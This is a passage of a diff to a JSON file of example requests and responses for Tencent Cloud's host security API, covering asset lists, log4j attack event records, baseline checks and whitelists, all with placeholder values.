"output": "{\n \"Response\": {\n \"Total\": 1,\n \"WebApps\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"RootPath\": \"/root\",\n \"ServiceType\": \"
|
863
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"WebApps\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"RootPath\": \"/root\",\n \"ServiceType\": \"Nginx\",\n \"Domain\": \"www.test.com\",\n \"VirtualPath\": \"/root\",\n \"PluginCount\": 1,\n \"Id\": \"10001\",\n \"Desc\": \"test domain\",\n \"MachineName\": \"test-name\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
878
864
|
"title": "获取资产管理Web应用列表"
|
879
865
|
}
|
880
866
|
],
|
@@ -882,7 +868,7 @@
|
|
882
868
|
{
|
883
869
|
"document": "",
|
884
870
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebAppPluginList\n<公共请求参数>\n\n{\n \"Offset\": 1,\n \"Id\": \"1001\",\n \"Limit\": 1,\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\"\n}",
|
885
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Plugins\": [\n {\n \"Version\": \"0.1.1\",\n \"Link\": \"\",\n \"Name\": \"test-name\",\n \"Desc\": \"test app\"\n }\n ]\n }\n}",
|
871
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\",\n \"Plugins\": [\n {\n \"Version\": \"0.1.1\",\n \"Link\": \"/bin\",\n \"Name\": \"test-name\",\n \"Desc\": \"test app\"\n }\n ]\n }\n}",
|
886
872
|
"title": "获取资产管理Web应用插件列表"
|
887
873
|
}
|
888
874
|
],
|
@@ -898,7 +884,7 @@
|
|
898
884
|
{
|
899
885
|
"document": "",
|
900
886
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebFrameList\n<公共请求参数>\n\n{}",
|
901
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"WebFrames\": [\n {\n \"MachineIp\": \"
|
887
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"WebFrames\": [\n {\n \"MachineIp\": \"1.1.1.1\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"Lang\": \"zh_cn\",\n \"ServiceType\": \"tcp\",\n \"MachineName\": \"test-name\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.1.1.1\",\n \"PrivateIP\": \"1.1.1.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-id\",\n \"InstanceID\": \"ins-id\",\n \"HostName\": \"test-name\"\n },\n \"Path\": \"/root\"\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
902
888
|
"title": "获取资产管理Web框架列表"
|
903
889
|
}
|
904
890
|
],
|
@@ -914,7 +900,7 @@
|
|
914
900
|
{
|
915
901
|
"document": "",
|
916
902
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebLocationInfo\n<公共请求参数>\n\n{\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Id\": \"1024\"\n}",
|
917
|
-
"output": "{\n \"Response\": {\n \"WebLocation\": {\n \"Name\": \"test-name\",\n \"Port\": \"22\",\n \"Proto\": \"tcp\",\n \"ServiceType\": \"web\",\n \"SafeStatus\": 1,\n \"User\": \"root\",\n \"MainPath\": \"/root\",\n \"Command\": \"
|
903
|
+
"output": "{\n \"Response\": {\n \"WebLocation\": {\n \"Name\": \"test-name\",\n \"Port\": \"22\",\n \"Proto\": \"tcp\",\n \"ServiceType\": \"web\",\n \"SafeStatus\": 1,\n \"User\": \"root\",\n \"MainPath\": \"/root\",\n \"Command\": \"sh ******\",\n \"Ip\": \"10.0.0.11\",\n \"UpdateTime\": \"2024-10-11 12:23:34\"\n },\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
918
904
|
"title": "获取Web站点详情"
|
919
905
|
}
|
920
906
|
],
|
@@ -922,7 +908,7 @@
|
|
922
908
|
{
|
923
909
|
"document": "",
|
924
910
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebLocationList\n<公共请求参数>\n\n{}",
|
925
|
-
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Locations\": [\n {\n \"Uuid\": \"
|
911
|
+
"output": "{\n \"Response\": {\n \"Total\": 1,\n \"Locations\": [\n {\n \"Uuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\",\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"MachineName\": \"test-name\",\n \"OsInfo\": \"CentOs Bit64\",\n \"Name\": \"test-name\",\n \"Port\": \"22\",\n \"Proto\": \"tcp\",\n \"ServiceType\": \"nginx\",\n \"PathCount\": 1,\n \"User\": \"root\",\n \"MainPath\": \"/root\",\n \"MainPathOwner\": \"/root\",\n \"Permission\": \" \",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Id\": \"wfwfw\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-dsd4\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
926
912
|
"title": "获取Web站点列表"
|
927
913
|
}
|
928
914
|
],
|
@@ -946,7 +932,7 @@
|
|
946
932
|
{
|
947
933
|
"document": "",
|
948
934
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAssetWebServiceInfoList\n<公共请求参数>\n\n{}",
|
949
|
-
"output": "{\n \"Response\": {\n \"WebServices\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"BinPath\": \"/root\",\n \"User\": \"root\",\n \"InstallPath\": \"/root\",\n \"ConfigPath\": \"/root\",\n \"ProcessCount\": 1,\n \"Id\": \"
|
935
|
+
"output": "{\n \"Response\": {\n \"WebServices\": [\n {\n \"MachineIp\": \"10.0.0.11\",\n \"MachineWanIp\": \"110.84.0.11\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"OsInfo\": \"CentOs Bit64\",\n \"ProjectId\": 1,\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"Name\": \"test-name\",\n \"Version\": \"0.1.1\",\n \"BinPath\": \"/root\",\n \"User\": \"root\",\n \"InstallPath\": \"/root\",\n \"ConfigPath\": \"/root\",\n \"ProcessCount\": 1,\n \"Id\": \"128455380\",\n \"MachineName\": \"test-name\",\n \"Desc\": \"idesc\",\n \"UpdateTime\": \"2024-10-11 12:23:34\",\n \"FirstTime\": \"2024-10-11 12:23:34\",\n \"IsNew\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"110.84.0.11\",\n \"PrivateIP\": \"10.0.0.11\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-12341234\",\n \"InstanceID\": \"ins-aj28fjz\",\n \"HostName\": \"test-name\"\n }\n }\n ],\n \"Total\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
950
936
|
"title": "查询资产管理Web服务列表"
|
951
937
|
}
|
952
938
|
],
|
@@ -962,7 +948,7 @@
|
|
962
948
|
{
|
963
949
|
"document": "网络攻击事件详情",
|
964
950
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAttackEventInfo\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
965
|
-
"output": "{\n \"Response\": {\n \"NetAttackEventInfo\": {\n \"AbnormalAction\": \"\",\n \"AttackLevel\": 3,\n \"CVEId\": \"CVE-2021-44228\",\n \"Count\": 5,\n \"DstPort\": 8080,\n \"HostOpType\": 0,\n \"Id\": 1,\n \"Location\": \"局域网\",\n \"MergeTime\": \"2023-05-27 14:37:51\",\n \"NetPayload\": \"
|
951
|
+
"output": "{\n \"Response\": {\n \"NetAttackEventInfo\": {\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-111\",\n \"NetworkName\": \"vpc-111\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"AbnormalAction\": \"login\",\n \"AttackLevel\": 3,\n \"CVEId\": \"CVE-2021-44228\",\n \"Count\": 5,\n \"DstPort\": 8080,\n \"HostOpType\": 0,\n \"Id\": 1,\n \"Location\": \"局域网\",\n \"MergeTime\": \"2023-05-27 14:37:51\",\n \"NetPayload\": \"GET /\",\n \"PayVersion\": 0,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"SrcIP\": \"10.0.0.5\",\n \"Status\": 1,\n \"SvcPs\": \"eyJhY2NvdW50IjoiMDowIiwiYXJndiI6Im5naW54OiBtYXN0ZXIgcHJvY2VzcyAuL3NiaW4vbmdpbnggLWMgY29uZi95dW5qaW5nLXByb3h5LWRldi5jb25mIC1wIC91c3IvbG9jYWwvc2VydmljZS95dW5qaW5nLXByb3h5IiwiZXhlIjoiL3Vzci9sb2NhbC9zZXJ2aWNlL3l1bmppbmctcHJveHkvc2Jpbi9uZ2lueCIsImxpc3RlbiI6IjAuMC4wLjA6ODA4MHwwLjAuMC4wOjkwODB8MC4wLjAuMDo1NTc0fDAuMC4wLjA6ODAiLCJwaWQiOjMyMzg1Mjh9\",\n \"Type\": 0,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"VulDefenceStatus\": 0,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"VulSupportDefense\": 1\n },\n \"RequestId\": \"c9669e5d-8093-4142-b4db-d03e15239235\"\n }\n}",
|
966
952
|
"title": "网络攻击事件详情"
|
967
953
|
}
|
968
954
|
],
|
@@ -970,7 +956,7 @@
|
|
970
956
|
{
|
971
957
|
"document": "网络攻击检测列表",
|
972
958
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAttackEvents\n<公共请求参数>\n\n{}",
|
973
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Count\": 6,\n \"DstPort\": 8080,\n \"Id\": 3,\n \"Location\": \"
|
959
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Count\": 6,\n \"New\": false,\n \"DstPort\": 8080,\n \"Id\": 3,\n \"Location\": \"北京市-北京市\",\n \"MachineExtraInfo\": {\n \"HostName\": \"hn***\",\n \"InstanceID\": \"ins-0cvonrya\",\n \"NetworkName\": \"vpc-d7f***\",\n \"NetworkType\": 0,\n \"PrivateIP\": \"10.0.0.5\",\n \"WanIP\": \"106.52.29.133\"\n },\n \"MergeTime\": \"2023-05-23T19:21:46+08:00\",\n \"PayVersion\": 2,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"SrcIP\": \"127.0.0.1\",\n \"Status\": 0,\n \"Type\": 0,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"VulDefenceStatus\": 0,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"VulSupportDefense\": 1\n },\n {\n \"New\": false,\n \"Count\": 5,\n \"DstPort\": 8080,\n \"Id\": 2,\n \"Location\": \"局域网\",\n \"MachineExtraInfo\": {\n \"HostName\": \"hn***\",\n \"InstanceID\": \"ins-0cvonrya\",\n \"NetworkName\": \"vpc-d7f***\",\n \"NetworkType\": 0,\n \"PrivateIP\": \"10.0.0.5\",\n \"WanIP\": \"106.52.29.133\"\n },\n \"MergeTime\": \"2023-05-23T14:43:28+08:00\",\n \"PayVersion\": 2,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"SrcIP\": \"10.0.0.14\",\n \"Status\": 0,\n \"Type\": 0,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"VulDefenceStatus\": 0,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"VulSupportDefense\": 1\n },\n {\n \"Count\": 5,\n \"DstPort\": 8080,\n \"Id\": 1,\n \"Location\": \"局域网\",\n \"MachineExtraInfo\": {\n \"HostName\": \"hn***\",\n \"InstanceID\": \"ins-0cvonrya\",\n \"NetworkName\": \"vpc-d7f***\",\n \"NetworkType\": 0,\n \"PrivateIP\": \"10.0.0.5\",\n \"WanIP\": \"106.52.29.133\"\n },\n \"MergeTime\": \"2023-05-23T14:37:51+08:00\",\n \"PayVersion\": 2,\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"SrcIP\": \"10.0.0.5\",\n \"Status\": 0,\n \"Type\": 0,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"VulDefenceStatus\": 0,\n \"VulId\": 101824,\n \"VulName\": \"Apache log4j2 远程代码执行漏洞 (CVE-2021-44228)\",\n \"VulSupportDefense\": 1,\n \"New\": false\n }\n ],\n \"RequestId\": \"dcdbc4d6-54c1-45d5-ab8e-4a7c9275c168\",\n \"TotalCount\": 3\n }\n}",
|
974
960
|
"title": "网络攻击检测列表"
|
975
961
|
}
|
976
962
|
],
|
@@ -1026,15 +1012,15 @@
|
|
1026
1012
|
{
|
1027
1013
|
"document": "",
|
1028
1014
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAttackVulTypeList\n<公共请求参数>\n\n{}",
|
1029
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
1030
|
-
"title": "
|
1015
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"F00A8503-6233-452E-913E-DAFEE9******\",\n \"List\": [\n \"命令注入\",\n \"fastjson命令执行\",\n \"非正常的威胁类型\"\n ]\n }\n}",
|
1016
|
+
"title": "获取网络攻击威胁类型列表"
|
1031
1017
|
}
|
1032
1018
|
],
|
1033
1019
|
"DescribeAvailableExpertServiceDetail": [
|
1034
1020
|
{
|
1035
1021
|
"document": "专家服务-可用订单详情",
|
1036
1022
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeAvailableExpertServiceDetail\n<公共请求参数>\n\n{}",
|
1037
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"EmergencyResponse\": 7,\n \"ExpertService\": [],\n \"ProtectNet\": 2,\n \"ExpertServiceBuy\": true,\n \"EmergencyResponseBuy\": true,\n \"ProtectNetBuy\": true\n }\n}",
|
1023
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"48ca3c70-801e-48b1-80a7-1007afbf5ffb\",\n \"EmergencyResponse\": 7,\n \"ExpertService\": [\n {\n \"OrderId\": 10021,\n \"InquireType\": 2,\n \"InquireNum\": 1022,\n \"BeginTime\": \"2024-11-04 21:24:47\",\n \"EndTime\": \"2024-11-04 21:24:55\",\n \"ServiceTime\": 134952943,\n \"Status\": 2\n }\n ],\n \"ProtectNet\": 2,\n \"ExpertServiceBuy\": true,\n \"EmergencyResponseBuy\": true,\n \"ProtectNetBuy\": true\n }\n}",
|
1038
1024
|
"title": "专家服务-可用订单详情"
|
1039
1025
|
}
|
1040
1026
|
],
|
@@ -1066,7 +1052,7 @@
|
|
1066
1052
|
{
|
1067
1053
|
"document": "",
|
1068
1054
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBanWhiteList\n&Offset=0\n&Limit=10\n&<公共请求参数>",
|
1069
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 4,\n \"WhiteList\": [\n {\n \"Id\": \"33\",\n \"SrcIp\": \"xx.xx.xx.xx\",\n \"ModifyTime\": \"2020-02-18 18:28:29\",\n \"CreateTime\": \"2020-02-18 18:28:29\",\n \"Remark\": \"532\",\n \"Uuid\": \"
|
1055
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 4,\n \"WhiteList\": [\n {\n \"Id\": \"33\",\n \"SrcIp\": \"xx.xx.xx.xx\",\n \"ModifyTime\": \"2020-02-18 18:28:29\",\n \"CreateTime\": \"2020-02-18 18:28:29\",\n \"Remark\": \"532\",\n \"Uuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"IsGlobal\": false,\n \"Quuid\": \"d4cc302e-09e5-436f-b99b-5ab9c9070323\",\n \"MachineIp\": \"1.1.1.1\",\n \"MachineName\": \"name******\"\n }\n ],\n \"RequestId\": \"aad8005f-2bf2-8b79-cfde-b030576f886e\"\n }\n}",
|
1070
1056
|
"title": "获取阻断白名单列表"
|
1071
1057
|
}
|
1072
1058
|
],
|
@@ -1081,8 +1067,8 @@
|
|
1081
1067
|
"DescribeBaselineBasicInfo": [
|
1082
1068
|
{
|
1083
1069
|
"document": "查询基线基础信息列表",
|
1084
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineBasicInfo\n&BaselineName=\"等保二级
|
1085
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
1070
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineBasicInfo\n&BaselineName=\"等保二级BCX\"\n&<公共请求参数>",
|
1071
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"ea71992a-b484-4d9c-882a-419fb6d0a5b0\",\n \"BaselineBasicInfoList\": [\n {\n \"Name\": \"等保二级BCX\",\n \"BaselineId\": 1,\n \"ParentId\": 1\n },\n {\n \"Name\": \"等保三级BCX\",\n \"BaselineId\": 2,\n \"ParentId\": 2\n }\n ]\n }\n}",
|
1086
1072
|
"title": "查询基线基础信息列表"
|
1087
1073
|
}
|
1088
1074
|
],
|
@@ -1097,8 +1083,8 @@
|
|
1097
1083
|
"DescribeBaselineDetail": [
|
1098
1084
|
{
|
1099
1085
|
"document": "根据基线id查询基线详情",
|
1100
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineDetail\n&BaselineId=5\n&<公共请求参数>",
|
1101
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"req-566234234\",\n \"BaselineDetail\": {\n \"Description\": \"基线详情描述\",\n \"Level\": 1,\n \"PackageName\": \"
|
1086
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeBaselineDetail\n&BaselineId=5\n&<公共请求参数> \n\n{\"BaselineId\":5747}",
|
1087
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"req-566234234\",\n \"BaselineDetail\": {\n \"Description\": \"基线详情描述\",\n \"Level\": 1,\n \"PackageName\": \"tename\",\n \"ParentId\": 1,\n \"Name\": \"tename\"\n }\n }\n}",
|
1102
1088
|
"title": "查询基线详情"
|
1103
1089
|
}
|
1104
1090
|
],
|
@@ -1106,7 +1092,7 @@
|
|
1106
1092
|
{
|
1107
1093
|
"document": "",
|
1108
1094
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeBaselineDetectList\n<公共请求参数>\n\n{}",
|
1109
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyId\": 172,\n \"TaskId\": 2290,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:41:07\",\n \"FinishTime\": \"2022-08-16 15:44:25\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2307,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:54:39\",\n \"FinishTime\": \"2022-08-16 17:55:19\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 168,\n \"TaskId\": 2298,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:06:08\",\n \"FinishTime\": \"2022-08-16 17:15:23\",\n \"PolicyName\": \"全部\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2295,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 16:56:35\",\n \"FinishTime\": \"2022-08-16 16:58:39\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2294,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 16:47:52\",\n \"FinishTime\": \"2022-08-16 16:48:48\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2288,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:02:40\",\n \"FinishTime\": \"2022-08-16 15:04:43\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 168,\n \"TaskId\": 2297,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:05:33\",\n \"FinishTime\": \"2022-08-16 17:10:58\",\n \"PolicyName\": \"全部\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2289,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:06:38\",\n \"FinishTime\": \"2022-08-16 15:08:20\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 255,\n \"TaskId\": 2305,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:13:52\",\n \"FinishTime\": \"2022-08-16 17:14:21\",\n \"PolicyName\": \"自定义啦啦\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 257,\n \"TaskId\": 2351,\n \"HostCount\": 47,\n \"StartTime\": \"2022-08-19 00:00:00\",\n \"FinishTime\": \"2022-08-19 00:17:15\",\n \"PolicyName\": \"
|
1095
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"PolicyId\": 172,\n \"TaskId\": 2290,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:41:07\",\n \"FinishTime\": \"2022-08-16 15:44:25\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2307,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:54:39\",\n \"FinishTime\": \"2022-08-16 17:55:19\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 168,\n \"TaskId\": 2298,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:06:08\",\n \"FinishTime\": \"2022-08-16 17:15:23\",\n \"PolicyName\": \"全部\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2295,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 16:56:35\",\n \"FinishTime\": \"2022-08-16 16:58:39\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2294,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 16:47:52\",\n \"FinishTime\": \"2022-08-16 16:48:48\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2288,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:02:40\",\n \"FinishTime\": \"2022-08-16 15:04:43\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 168,\n \"TaskId\": 2297,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:05:33\",\n \"FinishTime\": \"2022-08-16 17:10:58\",\n \"PolicyName\": \"全部\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 172,\n \"TaskId\": 2289,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 15:06:38\",\n \"FinishTime\": \"2022-08-16 15:08:20\",\n \"PolicyName\": \"专业版主机弱口令+旗舰版\",\n \"SuccessCount\": 0,\n \"FailedCount\": 0,\n \"TimeoutCount\": 0,\n \"PolicyDetectStatus\": 2\n },\n {\n \"PolicyId\": 255,\n \"TaskId\": 2305,\n \"HostCount\": 48,\n \"StartTime\": \"2022-08-16 17:13:52\",\n \"FinishTime\": \"2022-08-16 17:14:21\",\n \"PolicyName\": \"自定义啦啦\",\n \"SuccessCount\": 